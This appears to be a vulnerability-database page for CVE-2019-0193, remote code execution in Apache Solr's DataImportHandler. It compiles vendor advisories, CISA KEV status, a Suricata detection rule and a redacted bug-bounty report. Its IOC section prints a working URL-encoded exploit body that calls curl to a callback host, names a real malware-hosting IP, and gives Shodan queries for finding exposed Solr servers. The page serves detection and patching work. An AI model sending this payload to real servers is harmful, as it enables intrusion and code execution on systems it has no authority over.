CVE-2019-0193
published 2019-08-01CVE-2019-0193: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH…
PriorityP185high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-06-10
Exploited in the wild
EPSS
83.55%
99.6th percentile
In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | apache_solr | — | — |
| apache | solr | < 7.7.3 | 7.7.3 |
| apache | solr | >= 8.1.0 < 8.1.2 | 8.1.2 |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | lucene-solr | < lucene-solr 3.6.2+dfsg-22 (bookworm) | lucene-solr 3.6.2+dfsg-22 (bookworm) |
Detection & IOCsextracted from sources · hover to see the quote
commandcommand=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport↗
- →Exploit POST requests target the /solr/<core>/dataimport endpoint with Content-Type: application/x-www-form-urlencoded and the X-Requested-With: XMLHttpRequest header; the body contains debug=true and a dataConfig parameter embedding a <script> block with Java Runtime.exec() calls. ↗
- →Exploitation is confirmed by an outbound HTTP interaction (e.g., curl callback) originating from the Solr Java process; monitor for unexpected outbound HTTP/DNS from the Solr JVM process. ↗
- →Shodan/FOFA queries can identify exposed Solr instances: search for http.title:"apache solr", http.title:"solr admin", title="solr admin", or intitle:"apache solr" to find potentially vulnerable targets. ↗
- →In post-exploitation (Kinsing campaign), the attacker's initial runtime command was executed under the Java process of Apache Solr; alert on child process spawning (e.g., curl, sh, wget) from the Solr JVM. ↗
- →Kinsing post-exploitation drops a shell script to /tmp/zzz fetched from 194.87.252[.]159; monitor for curl/wget writing to /tmp with subsequent execution. ↗
- ·The vulnerability is only exploitable when the DIH module is enabled and the dataConfig request parameter is accepted; starting with Solr 8.2.0, the Java System property 'enable.dih.dataConfigParam' must be explicitly set to true for the parameter to be accepted. ↗
- ·As a mitigation short of patching, solrconfig.xml can be edited to configure all DataImportHandler usages with an 'invariants' section listing the 'dataConfig' parameter set to an empty string, or network controls can restrict access to the DataImportHandler endpoint. ↗
- ·The Nuclei template uses an OAST/interactsh callback to confirm exploitation; passive/blind detection requires an out-of-band interaction channel and will not fire on network-isolated Solr instances. ↗
CVSS provenance
nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
osv7.2HIGH
vulncheck7.2HIGH
cisa7.2HIGH
vendor_debian7.2LOW
vendor_redhat7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
XML External Entity (XXE) Injection in Apache Solr
ghsa·2019-08-01
CVE-2019-0193 [HIGH] CWE-94 XML External Entity (XXE) Injection in Apache Solr
XML External Entity (XXE) Injection in Apache Solr
In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
OSV
CVE-2019-0193: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the who
osv·2019-08-01·CVSS 7.2
CVE-2019-0193 [HIGH] CVE-2019-0193: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the who
In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
OSV
XML External Entity (XXE) Injection in Apache Solr
osv·2019-08-01
CVE-2019-0193 [HIGH] XML External Entity (XXE) Injection in Apache Solr
XML External Entity (XXE) Injection in Apache Solr
In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
VulnCheck
Apache Solr DataImportHandler Code Injection Vulnerability
vulncheck·2019·CVSS 7.2
CVE-2019-0193 [HIGH] CWE-94 Apache Solr DataImportHandler Code Injection Vulnerability
Apache Solr DataImportHandler Code Injection Vulnerability
The optional Apache Solr module DataImportHandler contains a code injection vulnerability.
Affected: Apache Solr
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743; https://blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/; https://www.bleepingcomputer.com/news/security/new-cryptomining-malware-builds-an-army-of-windows-linux-bots/; https://cujo.com/the-sysrv-botnet-and-how-it-evolved/; https://www.cisa.gov/sites/default/files/fee
Ubuntu
Apache Solr vulnerability
vendor_ubuntu·2025-02-21
CVE-2019-0193 Apache Solr vulnerability
Title: Apache Solr vulnerability
Summary: Apache Solr could be made to execute arbitrary code if it received
specially crafted input.
It was discovered that the Apache Solr DataImportHandler module incorrectly
handled certain request parameters in a default configuration. A remote
attacker could possibly use this issue to execute arbitrary code.
Instructions: In general, a standard system update will make all the necessary changes.
CISA
Apache Solr DataImportHandler Code Injection Vulnerability
cisa·2021-12-10·CVSS 7.2
CVE-2019-0193 [HIGH] CWE-94 Apache Solr DataImportHandler Code Injection Vulnerability
Vulnerability: Apache Solr DataImportHandler Code Injection Vulnerability
Affected: Apache Solr
The optional Apache Solr module DataImportHandler contains a code injection vulnerability.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2019-0193
Remediation Due Date: 2022-06-10
Red Hat
solr: Remote Code Execution via DataImportHandler
vendor_redhat·2019-07-31·CVSS 7.2
CVE-2019-0193 [HIGH] CWE-20 solr: Remote Code Execution via DataImportHandler
solr: Remote Code Execution via DataImportHandler
In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
A flaw was found in Apache Solr’s DataImportHandler(DIH). A DIH configuration containing scripts coming from a request's dataConfig parameter allows an attacker to perform remote code execution.
Mitigat
Debian
CVE-2019-0193: lucene-solr - In Apache Solr, the DataImportHandler, an optional but popular module to pull in...
vendor_debian·2019·CVSS 7.2
CVE-2019-0193 [HIGH] CVE-2019-0193: lucene-solr - In Apache Solr, the DataImportHandler, an optional but popular module to pull in...
In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
Scope: local
bookworm: resolved (fixed in 3.6.2+dfsg-22)
bullseye: resolved (fixed in 3.6.2+dfsg-22)
forky: resolved (fixed in 3.6.2+dfsg-22)
sid: resolved (fixed in 3.6.2+dfsg-22)
trixie: resolved (fixed in 3.6.2+dfsg-22)
Suricata
ET EXPLOIT Solr DataImport Handler RCE (CVE-2019-0193)
suricata·2021-06-08·CVSS 7.2
CVE-2019-0193 [HIGH] ET EXPLOIT Solr DataImport Handler RCE (CVE-2019-0193)
ET EXPLOIT Solr DataImport Handler RCE (CVE-2019-0193)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Solr DataImport Handler RCE (CVE-2019-0193)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/solr/"; content:"dataimport"; distance:0; http.request_body; content:"command=full-import"; fast_pattern; pcre:"/\bexec\b/Ri"; reference:cve,2019-0193; reference:url,github.com/jas502n/CVE-2019-0193; classtype:attempted-admin; sid:2033114; rev:2; metadata:attack_target Client_Endpoint, created_at 2021_06_08, cve CVE_2019_0193, deployment Perimeter, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_26;)
Nuclei
Apache Solr DataImportHandler <8.2.0 - Remote Code Execution
nuclei·CVSS 7.2
CVE-2019-0193 [HIGH] Apache Solr DataImportHandler <8.2.0 - Remote Code Execution
Apache Solr DataImportHandler <8.2.0 - Remote Code Execution
Apache Solr is vulnerable to remote code execution vulnerabilities via the DataImportHandler, an optional but popular module to pull in data from databases and other sources. The module has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk.
Template:
id: CVE-2019-0193
info:
name: Apache Solr DataImportHandler <8.2.0 - Remote Code Execution
author: pdteam
severity: high
description: |
Apache Solr is vulnerable to remote code execution vulnerabilities via the DataImportHandler, an optional but popular
Wiz
Summer '23 Cryptomining Attacks: Analysis + Recommendations | Wiz Blog
blogs_wiz·2023-09-06
Summer '23 Cryptomining Attacks: Analysis + Recommendations | Wiz Blog
During the summer of 2023, Wiz Research detected several different cryptomining incidents targeting cloud workloads. Combining Wiz Runtime Sensor events and information from Wiz agentless scanning, we were able to pinpoint security flaws that led to the attackers’ initial access, assess the scope of the compromised resources, and analyze the attackers’ activities.
Cryptomining stands out as a common threat to cloud workloads since it takes advantage of paid computing resources and yields direct monetary gains for the attackers. The threat actors behind these activities are mostly interested in making quick profits, aiming to spread their opportunistic mining operations as far and as wide as possible. Typically, these attacks aren't very complex or stealthy. The attackers usually look for
Wiz
Summer '23 Cryptomining Attacks: Analysis + Recommendations | Wiz Blog
blogs_wiz·2023-09-06
Summer '23 Cryptomining Attacks: Analysis + Recommendations | Wiz Blog
During the summer of 2023, Wiz Research detected several different cryptomining incidents targeting cloud workloads. Combining Wiz Runtime Sensor events and information from Wiz agentless scanning, we were able to pinpoint security flaws that led to the attackers’ initial access, assess the scope of the compromised resources, and analyze the attackers’ activities.
Cryptomining stands out as a common threat to cloud workloads since it takes advantage of paid computing resources and yields direct monetary gains for the attackers. The threat actors behind these activities are mostly interested in making quick profits, aiming to spread their opportunistic mining operations as far and as wide as possible. Typically, these attacks aren't very complex or stealthy. The attackers usually look for
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
CVE-2020-28188 [HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
[HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (November 2020-January 2021)
Lei Xu
Yue Guan
Vaibhav Singhal
Published: April 12, 2021
Malware
Trend Reports
Vulnerabilities
Botnet
DDoS
Exploit kit
IoT
Network security trends
## Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020 . Several newly observed exploits, including CVE-2020-28188 , CVE-2020-17519 , and CVE-2020-29227 , have emerged and were continuously being exploited in the wild as of late 2020 to earl
Zscaler
A look at the recent BuleHero botnet payload | Zscaler
blogs_zscaler·2019-12-12
A look at the recent BuleHero botnet payload | Zscaler
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
HackerOne
Remote Code Execution on █████████
hackerone·2020-09-03·CVSS 9.8
CVE-2019-0192 [CRITICAL] Remote Code Execution on █████████
Remote Code Execution on █████████
**Summary:**
An unauth solr lead to RCE on ██████████
**Description:**
Hello, I found a solr unauth at https://██████/solr/
This version is 5.5.1, vulnerable with CVE-2019-0192 and CVE-2019-0193, i have try CVE-2019-0193 and successful RCE.
## Impact
Attacker can get shell on server.
## Step-by-step Reproduction Instructions
1. First go to Core Admin and copy path.
██████
2. Update the config.
███████
3. Execute code.
██████████
## Product, Version, and Configuration (If applicable)
Apache Sole 5.5.1
## Suggested Mitigation/Remediation Actions
Update to the latest version and set auth.
## Impact
Attacker can get shell on server.
Bugzilla
CVE-2019-0193 solr3: solr: Remote Code Execution via DataImportHandler [fedora-all]
bugzilla·2019-08-02·CVSS 7.2
CVE-2019-0193 [HIGH] CVE-2019-0193 solr3: solr: Remote Code Execution via DataImportHandler [fedora-all]
CVE-2019-0193 solr3: solr: Remote Code Execution via DataImportHandler [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported ve
Bugzilla
CVE-2019-0193 solr: Remote Code Execution via DataImportHandler
bugzilla·2019-08-01·CVSS 7.2
CVE-2019-0193 [HIGH] CVE-2019-0193 solr: Remote Code Execution via DataImportHandler
CVE-2019-0193 solr: Remote Code Execution via DataImportHandler
The DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
References:
https://issues.apache.org/jira/browse/SOLR-13669
Discussion:
Created solr3 tracking bugs for this issue:
Affects: fedora-all [bug 1736775]
---
This vulnerability is out of security suppor
https://issues.apache.org/jira/browse/SOLR-13669https://lists.apache.org/thread.html/1addbb49a1fc0947fb32ca663d76d93cfaade35a4848a76d4b4ded9c%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/42cc4d334ba33905b872a0aa00d6a481391951c8b1450f01b077ce74%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/55880d48e38ba9e8c41a3b9e41051dbfdef63b86b0cfeb32967edf03%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/6f2d61bd8732224c5fd3bdd84798f8e01e4542d3ee2f527a52a81b83%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/7143983363f0ba463475be4a8b775077070a08dbf075449b7beb51ee%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/9b0e7a7e3e18d0724f511403b364fc082ff56e3134d84cfece1c82fc%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/a6e3c09dba52b86d3a1273f82425973e1b0623c415d0e4f121d89eab%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3Ehttps://lists.apache.org/thread.html/e85f735fad06a0fb46e74b7e6e9ce7ded20b59637cd9f993310f814d%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/r140128dc6bb4f4e0b6a39e962c7ca25a8cbc8e48ed766176c931fccc%40%3Cusers.solr.apache.org%3Ehttps://lists.apache.org/thread.html/r19d23e8640236a3058b4d6c23e5cd663fde182255f5a9d63e0606a66%40%3Cdev.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1%40%3Ccommits.druid.apache.org%3Ehttps://lists.apache.org/thread.html/r339865b276614661770c909be1dd7e862232e3ef0af98bfd85686b51%40%3Cdev.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/r33aed7ad4ee9833c4190a44e2b106efd2deb19504b85e012175540f6%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/r3da74965aba2b5f5744b7289ad447306eeb2940c872801819faa9314%40%3Cusers.solr.apache.org%3Ehttps://lists.apache.org/thread.html/r95df34bb158375948da82b4dfe9a1b5d528572d586584162f8f5aeef%40%3Cusers.solr.apache.org%3Ehttps://lists.apache.org/thread.html/rb34d820c21f1708c351f9035d6bc7daf80bfb6ef99b34f7af1d2f699%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/rc400db37710ee79378b6c52de3640493ff538c2beb41cefdbbdf2ab8%40%3Ccommits.submarine.apache.org%3Ehttps://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3Ehttps://lists.debian.org/debian-lts-announce/2019/10/msg00013.htmlhttps://lists.debian.org/debian-lts-announce/2020/08/msg00025.htmlhttps://issues.apache.org/jira/browse/SOLR-13669https://lists.apache.org/thread.html/1addbb49a1fc0947fb32ca663d76d93cfaade35a4848a76d4b4ded9c%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/42cc4d334ba33905b872a0aa00d6a481391951c8b1450f01b077ce74%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/55880d48e38ba9e8c41a3b9e41051dbfdef63b86b0cfeb32967edf03%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/6f2d61bd8732224c5fd3bdd84798f8e01e4542d3ee2f527a52a81b83%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/7143983363f0ba463475be4a8b775077070a08dbf075449b7beb51ee%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/9b0e7a7e3e18d0724f511403b364fc082ff56e3134d84cfece1c82fc%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/a6e3c09dba52b86d3a1273f82425973e1b0623c415d0e4f121d89eab%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3Ehttps://lists.apache.org/thread.html/e85f735fad06a0fb46e74b7e6e9ce7ded20b59637cd9f993310f814d%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/r140128dc6bb4f4e0b6a39e962c7ca25a8cbc8e48ed766176c931fccc%40%3Cusers.solr.apache.org%3Ehttps://lists.apache.org/thread.html/r19d23e8640236a3058b4d6c23e5cd663fde182255f5a9d63e0606a66%40%3Cdev.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1%40%3Ccommits.druid.apache.org%3Ehttps://lists.apache.org/thread.html/r339865b276614661770c909be1dd7e862232e3ef0af98bfd85686b51%40%3Cdev.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/r33aed7ad4ee9833c4190a44e2b106efd2deb19504b85e012175540f6%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/r3da74965aba2b5f5744b7289ad447306eeb2940c872801819faa9314%40%3Cusers.solr.apache.org%3Ehttps://lists.apache.org/thread.html/r95df34bb158375948da82b4dfe9a1b5d528572d586584162f8f5aeef%40%3Cusers.solr.apache.org%3Ehttps://lists.apache.org/thread.html/rb34d820c21f1708c351f9035d6bc7daf80bfb6ef99b34f7af1d2f699%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/rc400db37710ee79378b6c52de3640493ff538c2beb41cefdbbdf2ab8%40%3Ccommits.submarine.apache.org%3Ehttps://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3Ehttps://lists.debian.org/debian-lts-announce/2019/10/msg00013.htmlhttps://lists.debian.org/debian-lts-announce/2020/08/msg00025.htmlhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-0193
2019-08-01
Published
2021-12-10
Added to CISA KEV
Exploited in the wild